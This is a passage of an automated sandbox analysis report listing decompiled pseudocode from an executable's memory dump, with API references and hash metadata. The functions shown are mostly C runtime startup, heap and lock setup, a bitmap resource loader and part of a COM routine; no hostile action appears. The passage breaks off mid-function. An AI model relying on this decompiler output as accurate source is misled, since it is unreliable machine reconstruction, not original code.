                  					 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
                  					E00420C7F(0x10);
                  				}
                  				return E00429303( *_t19);
                  			}





                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041F07C
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C47
                    • Part of subcall function 00420C0D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C59
                    • Part of subcall function 00420C0D: LeaveCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C66
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C76
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                  • String ID:
                  • API String ID: 1641187343-0
                  • Opcode ID: c0216205ed77c7cc1f131cf05e65f243ad3cd27ceee9a1bc5f39da4a9754f464
                  • Instruction ID: 3dd9fac96ffd4f8c3fa54f6b7e61c1b4760e57862e1cb66ca705b6a13e6fc861
                  • Opcode Fuzzy Hash: c0216205ed77c7cc1f131cf05e65f243ad3cd27ceee9a1bc5f39da4a9754f464
                  • Instruction Fuzzy Hash: 0BE09230304210E7D774AFB5C442789B6E07F14354F50462EF9E0DA2C2DB748D409718
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 100%
                  			E0042C630(intOrPtr _a4) {
                  				void* _t6;
                  
                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                  				 *0x45024c = _t6;
                  				if(_t6 != 0) {
                  					 *0x451924 = 1;
                  					return 1;
                  				} else {
                  					return _t6;
                  				}
                  			}




                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0042C645
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: f0721fcb8ddfb9430277d72bca9d0576c2c484b911b8e0f7858c656aa6a95d2c
                  • Instruction ID: dc21e2f7d52cc5223e6b36bdbaf9974fbecc4c3c998ff19ee700cf7bf4ea1111
                  • Opcode Fuzzy Hash: f0721fcb8ddfb9430277d72bca9d0576c2c484b911b8e0f7858c656aa6a95d2c
                  • Instruction Fuzzy Hash: 24D05E766913045ADB105F757C0876A3BDCD384396F108436B84CC6290E574C950CA4C
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 75%
                  			E00429111(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t9;
                  				void* _t18;
                  
                  				_push(0xc);
                  				_push(0x447b58);
                  				E00429338(__ebx, __edi, __esi);
                  				E0042AF11();
                  				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
                  				_t9 = E00429026(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
                  				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
                  				 *(_t18 - 4) = 0xfffffffe;
                  				E00429147();
                  				return E0042937D( *((intOrPtr*)(_t18 - 0x1c)));
                  			}





                  APIs
                    • Part of subcall function 0042AF11: __lock.LIBCMT ref: 0042AF13
                  • __onexit_nolock.LIBCMT ref: 00429129
                    • Part of subcall function 00429026: __decode_pointer.LIBCMT ref: 00429035
                    • Part of subcall function 00429026: __decode_pointer.LIBCMT ref: 00429045
                    • Part of subcall function 00429026: __msize.LIBCMT ref: 00429063
                    • Part of subcall function 00429026: __realloc_crt.LIBCMT ref: 00429087
                    • Part of subcall function 00429026: __realloc_crt.LIBCMT ref: 0042909D
                    • Part of subcall function 00429026: __encode_pointer.LIBCMT ref: 004290AF
                    • Part of subcall function 00429026: __encode_pointer.LIBCMT ref: 004290BD
                    • Part of subcall function 00429026: __encode_pointer.LIBCMT ref: 004290C8
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                  • String ID:
                  • API String ID: 1316407801-0
                  • Opcode ID: d0cba814af76e99fa1f5c5100ac0f924490c0fad868057674edee770e45ccadb
                  • Instruction ID: 256d7cc1d37675ab01bdc673f319943b9992eb9d29c4a49d690572677a75f72f
                  • Opcode Fuzzy Hash: d0cba814af76e99fa1f5c5100ac0f924490c0fad868057674edee770e45ccadb
                  • Instruction Fuzzy Hash: 65D01770A00219AADB10FBAAEC06B9C7670AF44318FA0414EB420661D2CA3C1E019A4D
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 68%
                  			E0043236F(void* __eflags) {
                  				int _t9;
                  				void* _t12;
                  				void* _t13;
                  				void* _t14;
                  				void* _t15;
                  
                  				_push(0x10);
                  				_push(0x447f08);
                  				E00429338(_t12, _t13, _t14);
                  				 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
                  				_t9 = InitializeCriticalSectionAndSpinCount( *(_t15 + 8),  *(_t15 + 0xc)); // executed
                  				 *(_t15 - 0x1c) = _t9;
                  				 *(_t15 - 4) = 0xfffffffe;
                  				return E0042937D( *(_t15 - 0x1c));
                  			}








                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNELBASE(8007000E,?,00447F08,00000010,0042EA88,00000000,00000FA0,00447E48,0000000C,0042EAE9,8007000E,?,?,00430446,00000004,00447EC8), ref: 00432385
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID:
                  • API String ID: 2593887523-0
                  • Opcode ID: 435db0119b2e2a5cd1513eb4b7c5634abbb2a5105ebc6a46fd6bf240d20ba23a
                  • Instruction ID: 0b45ea81c99c3eaf9b4dca524f18df2cf3e30860aae513f0f2e3f31f292ba95f
                  • Opcode Fuzzy Hash: 435db0119b2e2a5cd1513eb4b7c5634abbb2a5105ebc6a46fd6bf240d20ba23a
                  • Instruction Fuzzy Hash: A6D05E30940309EBDF10EFA5DC057DC7B30AF08320FA08155B821662E0C3BD5E12AF48
                  Uniqueness

                  Uniqueness Score: 0.08%

                  C-Code - Quality: 100%
                  			E0042D433() {
                  				intOrPtr _t1;
                  
                  				_t1 = E0042C093(E0042D3AF); // executed
                  				 *0x450250 = _t1;
                  				return _t1;
                  			}




                  APIs
                  • __encode_pointer.LIBCMT ref: 0042D438
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0A5
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000003,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0BC
                    • Part of subcall function 0042C093: RtlEncodePointer.NTDLL(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0FA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 3ce54f7310ca48c7751c76d8a15b172f27dc05c7042c64af59e04d961205916c
                  • Instruction ID: b882495202cef156864d025d42edda82f839d3d5945db6e760e545b44dfa8962
                  • Opcode Fuzzy Hash: 3ce54f7310ca48c7751c76d8a15b172f27dc05c7042c64af59e04d961205916c
                  • Instruction Fuzzy Hash: 44A022A2B003A0C00200BBB0BC8230823802280B02FB000BFB028CA0C2CF288000080F
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 100%
                  			E0042C105() {
                  				void* _t1;
                  
                  				_t1 = E0042C093(0); // executed
                  				return _t1;
                  			}




                  APIs
                  • __encode_pointer.LIBCMT ref: 0042C107
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0A5
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000003,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0BC
                    • Part of subcall function 0042C093: RtlEncodePointer.NTDLL(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0FA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 13a17f0596a0aed883ed0105cb9e7537870fdc0ce3ddd250ed4f3766f44b6160
                  • Instruction ID: 2fc5ce743ffed4cb605e1d783de8b42f57259c5a4fea7c046effaedeb37e91c5
                  • Opcode Fuzzy Hash: 13a17f0596a0aed883ed0105cb9e7537870fdc0ce3ddd250ed4f3766f44b6160
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 89%
                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t25;
                  				void* _t26;
                  				void* _t28;
                  				void* _t33;
                  				void* _t34;
                  				intOrPtr _t35;
                  				intOrPtr _t37;
                  				intOrPtr _t45;
                  				signed int _t51;
                  				void* _t61;
                  				intOrPtr _t63;
                  				void* _t66;
                  				void* _t68;
                  
                  				_t61 = __edx;
                  				E0042C660(); // executed
                  				_push(0x58);
                  				_push(0x447af0);
                  				E00429338(__ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t66 - 4)) = 0;
                  				GetStartupInfoW(_t66 - 0x68);
                  				_t63 = 0xfffffffe;
                  				 *((intOrPtr*)(_t66 - 4)) = _t63;
                  				_t68 =  *0x400000 - 0x5a4d; // 0x5a4d
                  				if(_t68 != 0) {
                  					L6:
                  					 *(_t66 - 0x1c) = 0;
                  				} else {
                  					_t45 =  *0x40003c; // 0xe8
                  					if( *((intOrPtr*)(_t45 + 0x400000)) != 0x4550 ||  *((intOrPtr*)(_t45 + 0x400018)) != 0x10b ||  *((intOrPtr*)(_t45 + 0x400074)) <= 0xe) {
                  						goto L6;
                  					} else {
                  						 *(_t66 - 0x1c) = 0 |  *((intOrPtr*)(_t45 + 0x4000e8)) != 0x00000000;
                  					}
                  				}
                  				_t25 = E0042C630(1); // executed
                  				if(_t25 == 0) {
                  					E00427869(0x1c);
                  				}
                  				_t26 = E0042C4A3(1);
                  				_t74 = _t26;
                  				if(_t26 == 0) {
                  					E00427869(0x10);
                  				}
                  				E0042C047();
                  				 *((intOrPtr*)(_t66 - 4)) = 1;
                  				_t28 = E0042BDF3(1, _t63, 0, _t74); // executed
                  				if(_t28 < 0) {
                  					E0042AEA5(_t61, _t63, 0x1b);
                  				}
                  				 *0x451a54 = GetCommandLineW();
                  				 *0x44fccc = E0042BD96();
                  				if(E0042BCE8() < 0) {
                  					_t31 = E0042AEA5(_t61, _t63, 8);
                  				}
                  				if(E0042BAB9(_t31, _t61) < 0) {
                  					E0042AEA5(_t61, _t63, 9);
                  				}
                  				_t33 = E0042AF64(1); // executed
                  				if(_t33 != 0) {
                  					E0042AEA5(_t61, _t63, _t33);
                  				}
                  				_t34 = E0042BA73();
                  				_t79 =  *(_t66 - 0x3c) & 1;
                  				if(( *(_t66 - 0x3c) & 1) == 0) {
                  					_t51 = 0xa;
                  				} else {
                  					_t51 =  *(_t66 - 0x38) & 0x0000ffff;
                  				}
                  				_push(_t51);
                  				_t35 = E0043820A(_t51, _t61, _t79, 0x400000, 0, _t34); // executed
                  				 *((intOrPtr*)(_t66 - 0x20)) = _t35;
                  				if( *(_t66 - 0x1c) == 0) {
                  					E0042B115(_t35);
                  				}
                  				E0042B141();
                  				 *((intOrPtr*)(_t66 - 4)) = _t63;
                  				_t37 =  *((intOrPtr*)(_t66 - 0x20));
                  				return E0042937D(_t37);
                  			}

















                  APIs
                  • ___security_init_cookie.LIBCMT ref: 00427A0F
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ___security_init_cookie
                  • String ID:
                  • API String ID: 3657697845-0
                  • Opcode ID: 53b8f16b72db3310721ece346a94ebdface8abf86fc276f890df9f663dee7cac
                  • Instruction ID: cb5d0c60b16b6ce24c2eda005c90f3fcf977391523bc92f21d27921aeb9617b1
                  • Opcode Fuzzy Hash: 53b8f16b72db3310721ece346a94ebdface8abf86fc276f890df9f663dee7cac
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: 0.71%

                  Non-executed Functions

                  C-Code - Quality: 98%
                  			E004190A2(signed int _a4, signed int _a8, int _a12) {
                  				BITMAPINFO* _v8;
                  				struct HDC__* _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t53;
                  				BITMAPINFO* _t54;
                  				BITMAPINFO* _t59;
                  				signed char _t63;
                  				struct HDC__* _t69;
                  				struct HBITMAP__* _t70;
                  				void* _t74;
                  				struct HDC__* _t75;
                  				signed int _t79;
                  				struct HWND__* _t84;
                  				intOrPtr* _t92;
                  				void* _t97;
                  				signed int _t98;
                  				intOrPtr _t102;
                  				int* _t103;
                  				int _t104;
                  				BITMAPINFO* _t107;
                  
                  				_t53 = LoadResource(_a4, _a8);
                  				_t84 = 0;
                  				_v24 = _t53;
                  				if(_t53 != 0) {
                  					_t54 = LockResource(_t53);
                  					_v8 = _t54;
                  					__eflags = _t54;
                  					if(_t54 == 0) {
                  						goto L1;
                  					}
                  					_t101 = _t54->bmiHeader + 0x40;
                  					_t107 = E004282CD(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
                  					__eflags = _t107;
                  					if(_t107 != 0) {
                  						E00402850(0, _t107, _t101, _v8, _t101);
                  						_t59 = _t107 + _t107->bmiHeader;
                  						__eflags = _t59;
                  						_v12 = _t59;
                  						_a8 = 0;
                  						do {
                  							_t92 = _t59 + _a8 * 4;
                  							_t102 =  *_t92;
                  							_t98 = 0;
                  							__eflags = 0;
                  							_v16 = _t92;
                  							while(1) {
                  								__eflags = _t102 -  *((intOrPtr*)(0x43f23c + _t98 * 8));
                  								if(_t102 ==  *((intOrPtr*)(0x43f23c + _t98 * 8))) {
                  									break;
                  								}
                  								_t98 = _t98 + 1;
                  								__eflags = _t98 - 4;
                  								if(_t98 < 4) {
                  									continue;
                  								}
                  								goto L14;
                  							}
                  							__eflags = _a12 - _t84;
                  							if(_a12 == _t84) {
                  								_t103 = 0x43f240 + _t98 * 8;
                  								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
                  								_t63 = GetSysColor( *_t103);
                  								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
                  								_t59 = _v12;
                  								_t84 = 0;
                  								__eflags = 0;
                  							} else {
                  								__eflags =  *(0x43f240 + _t98 * 8) - 0x12;
                  								if( *(0x43f240 + _t98 * 8) != 0x12) {
                  									 *_t92 = 0xffffff;
                  								}
                  							}
                  							L14:
                  							_a8 = _a8 + 1;
                  							__eflags = _a8 - 0x10;
                  						} while (_a8 < 0x10);
                  						_t104 = _t107->bmiHeader.biWidth;
                  						_a12 = _t104;
                  						_a8 = _t107->bmiHeader.biHeight;
                  						_t69 = GetDC(_t84);
                  						_v12 = _t69;
                  						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
                  						_v16 = _t70;
                  						__eflags = _t70 - _t84;
                  						if(__eflags != 0) {
                  							_t75 = CreateCompatibleDC(_v12);
                  							_t104 = SelectObject;
                  							_a4 = _t75;
                  							_v20 = SelectObject(_t75, _v16);
                  							_t79 = 1 << _t107->bmiHeader.biBitCount;
                  							__eflags = 1;
                  							_t40 = _t79 * 4; // 0xa8
                  							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + _t40 + 0x28, _t107, _t84, 0xcc0020);
                  							SelectObject(_a4, _v20);
                  							DeleteDC(_a4);
                  						}
                  						ReleaseDC(_t84, _v12);
                  						_push(_t107);
                  						E00428397(_t84, _t104, _t107, __eflags);
                  						FreeResource(_v24);
                  						_t74 = _v16;
                  						goto L18;
                  					} else {
                  						_t74 = 0;
                  						L18:
                  						return _t74;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}






























                  APIs
                  • LoadResource.KERNEL32(004067C9,?,00000000,004067C9,?,?,004067C9,00000080,?,?,?,0000E800), ref: 004190B1
                  • LockResource.KERNEL32(00000000,?,004067C9,00000080,?,?,?,0000E800), ref: 004190C8
                  • _malloc.LIBCMT ref: 004190DD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$LoadLock_malloc
                  • String ID:
                  • API String ID: 2582927105-0
                  • Opcode ID: 72b139f24afd76829470f9b937fd0400b2ca6d3edc243f5937ebc25a02abbe8c
                  • Instruction ID: 2cbef2811495ef08249826e9859fe603c90bc7921312da5709a73e17ebf10656
                  • Opcode Fuzzy Hash: 72b139f24afd76829470f9b937fd0400b2ca6d3edc243f5937ebc25a02abbe8c
                  • Instruction Fuzzy Hash: 5B51AD72900109FFDF009FA5CC888AEBFB5FF48344B10846AF91597220C7359AA1EF65
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 94%
                  			E00412AE3(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
                  				intOrPtr _t284;
                  				intOrPtr _t285;
                  				intOrPtr _t286;
                  				intOrPtr _t288;
                  				struct HINSTANCE__** _t291;
                  				intOrPtr _t294;
                  				signed int _t302;
                  				signed int _t305;
                  				signed int _t318;
                  				signed int _t323;
                  				signed int _t328;
                  				intOrPtr _t332;
                  				signed int _t333;
                  				intOrPtr _t342;
                  				intOrPtr _t352;
                  				signed int _t361;
                  				intOrPtr* _t365;
                  				signed int _t369;
                  				intOrPtr _t372;
                  				intOrPtr _t387;
                  				signed int _t439;
                  				signed int _t442;
                  				signed int _t445;
                  				signed int _t450;
                  				void* _t452;
                  				intOrPtr _t453;
                  				signed int _t455;
                  				void* _t456;
                  				void* _t457;
                  				void* _t461;
                  				void* _t464;
                  				intOrPtr _t473;
                  				void* _t476;
                  				void* _t481;
                  				void* _t489;
                  				void* _t504;
                  
                  				_t451 = __esi;
                  				_push(0x18);
                  				_t282 = E0042922B(E00438C36, __ebx, __edi, __esi);
                  				_t369 = __ecx;
                  				 *(_t456 - 0x24) = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x78)) == 1) {
                  					_t372 =  *((intOrPtr*)(__ecx + 0x74));
                  					_t450 = 0;
                  					if( *((intOrPtr*)(_t372 + 0x30)) != 0) {
                  						_t365 =  *((intOrPtr*)(__ecx + 0x80));
                  						_t461 =  *((intOrPtr*)( *_t365 + 0x44))(_t365,  *((intOrPtr*)(_t372 + 0x30)));
                  						_t375 = 0 | _t461 < 0x00000000;
                  						if(_t461 < 0) {
                  							L3:
                  							E00413DD0(_t375);
                  						}
                  					}
                  					_t284 =  *((intOrPtr*)(_t369 + 0x74));
                  					_t463 =  *((intOrPtr*)(_t284 + 0x3c)) - _t450;
                  					if( *((intOrPtr*)(_t284 + 0x3c)) != _t450) {
                  						E00410F00(_t369, _t456 - 0x20, _t450, _t451, _t463);
                  						_t361 =  *(_t369 + 0x80);
                  						 *(_t456 - 4) = _t450;
                  						_t464 =  *((intOrPtr*)( *_t361 + 0x58))(_t361,  *(_t456 - 0x20),  *((intOrPtr*)(_t284 + 0x3c))) - _t450;
                  						_t375 = 0 | _t464 >= 0x00000000;
                  						if(_t464 >= 0 == _t450) {
                  							goto L3;
                  						} else {
                  							 *(_t456 - 4) =  *(_t456 - 4) | 0xffffffff;
                  							E004055F0( *(_t456 - 0x20) + 0xfffffff0);
                  						}
                  					}
                  					_t285 =  *((intOrPtr*)(_t369 + 0x74));
                  					if( *(_t285 + 0xc) != _t450) {
                  						_t451 =  *(_t285 + 0xc);
                  						 *(_t456 - 0x14) = _t450;
                  						if( *_t451 != _t450) {
                  							do {
                  								_t452 = _t451 + 2 + E00429211(_t451) * 2;
                  								_t323 = E00429211(_t452);
                  								 *(_t456 - 0x14) =  *(_t456 - 0x14) + 1;
                  								_t451 = _t452 + 2 + _t323 * 2;
                  							} while ( *_t451 != _t450);
                  							_t324 =  *(_t456 - 0x14);
                  							_t470 =  *(_t456 - 0x14) - _t450;
                  							if( *(_t456 - 0x14) > _t450) {
                  								_t439 = 8;
                  								_t450 = E0040B71F(_t470,  ~(0 | _t470 > 0x00000000) | _t324 * _t439);
                  								_pop(_t382);
                  								if(_t450 == 0) {
                  									L12:
                  									E00413D98(_t382);
                  								}
                  								 *(_t456 - 0x20) =  *(_t456 - 0x20) & 0x00000000;
                  								_t472 =  *(_t456 - 0x14);
                  								_t453 =  *((intOrPtr*)( *((intOrPtr*)(_t369 + 0x74)) + 0xc));
                  								if( *(_t456 - 0x14) > 0) {
                  									while(1) {
                  										E00404820(_t456 - 0x1c);
                  										 *(_t456 - 4) = 1;
                  										_t369 = E00429211(_t453) + 1;
                  										_t442 = 2;
                  										_t342 = E0040B71F(_t472,  ~(0 | _t472 > 0x00000000) | _t369 * _t442);
                  										_pop(_t382);
                  										 *((intOrPtr*)(_t456 - 0x18)) = _t342;
                  										_t473 = _t342;
                  										if(_t473 == 0) {
                  											goto L12;
                  										}
                  										E00405C40(_t456 - 0x1c, _t453);
                  										_t398 =  *(_t456 - 0x1c);
                  										E0042814C(_t369,  *(_t456 - 0x1c),  *((intOrPtr*)(_t456 - 0x18)),  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) +  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + 2, _t398,  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + _t345 + 2);
                  										_t369 = _t453 + _t369 * 2;
                  										 *((intOrPtr*)(_t450 +  *(_t456 - 0x20) * 8)) =  *((intOrPtr*)(_t456 - 0x18));
                  										_t455 = E00429211(_t369) + 1;
                  										_t445 = 2;
                  										_t382 =  ~(_t473 > 0) | _t455 * _t445;
                  										_t352 = E0040B71F(_t473,  ~(_t473 > 0) | _t455 * _t445);
                  										_t457 = _t457 + 0x18;
                  										 *((intOrPtr*)(_t456 - 0x18)) = _t352;
                  										if(_t352 == 0) {
                  											goto L12;
                  										} else {
                  											E00405C40(_t456 - 0x1c, _t369);
                  											_t404 =  *(_t456 - 0x1c);
                  											E0042814C(_t369,  *(_t456 - 0x1c),  *((intOrPtr*)(_t456 - 0x18)),  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) +  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + 2, _t404,  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + _t354 + 2);
                  											 *(_t456 - 4) =  *(_t456 - 4) | 0xffffffff;
                  											 *((intOrPtr*)(_t450 + 4 +  *(_t456 - 0x20) * 8)) =  *((intOrPtr*)(_t456 - 0x18));
                  											_t457 = _t457 + 0x10;
                  											 *(_t456 - 0x20) =  *(_t456 - 0x20) + 1;
                  											_t453 = _t369 + _t455 * 2;
                  											E004055F0( *(_t456 - 0x1c) + 0xfffffff0);
                  											if( *(_t456 - 0x20) <  *(_t456 - 0x14)) {
                  												continue;
                  											} else {
                  												_t369 =  *(_t456 - 0x24);
                  											}
                  										}
                  										goto L18;
                  									}
                  									goto L12;
                  								}
                  								L18:
                  								_t328 =  *(_t369 + 0x80);
                  								_t476 =  *((intOrPtr*)( *_t328 + 0x10))(_t328,  *(_t456 - 0x14), _t450);
                  								_t375 = 0 | _t476 >= 0x00000000;
                  								_t451 = 0;
                  								if(_t476 >= 0) {
                  									goto L3;
                  								} else {
                  									_t478 =  *(_t456 - 0x14);
                  									if( *(_t456 - 0x14) > 0) {
                  										do {
                  											E0040B74E(_t369, _t450, _t451, _t478,  *((intOrPtr*)(_t450 + _t451 * 8)));
                  											E0040B74E(_t369, _t450, _t451, _t478,  *((intOrPtr*)(_t450 + 4 + _t451 * 8)));
                  											_t451 = _t451 + 1;
                  											_t479 = _t451 -  *(_t456 - 0x14);
                  										} while (_t451 <  *(_t456 - 0x14));
                  									}
                  									E0040B74E(_t369, _t450, _t451, _t479, _t450);
                  									_t332 =  *((intOrPtr*)(_t369 + 0x74));
                  									_t387 = 1;
                  									if( *((intOrPtr*)(_t332 + 0x18)) > 1) {
                  										_t387 =  *((intOrPtr*)(_t332 + 0x18));
                  									}
                  									_t333 =  *(_t369 + 0x80);
                  									_t481 =  *((intOrPtr*)( *_t333 + 0x14))(_t333, _t387);
                  									_t375 = 0 | _t481 >= 0x00000000;
                  									if(_t481 >= 0) {
                  										goto L3;
                  									} else {
                  										_t450 = 0;
                  									}
                  								}
                  							}
                  						}
                  					}
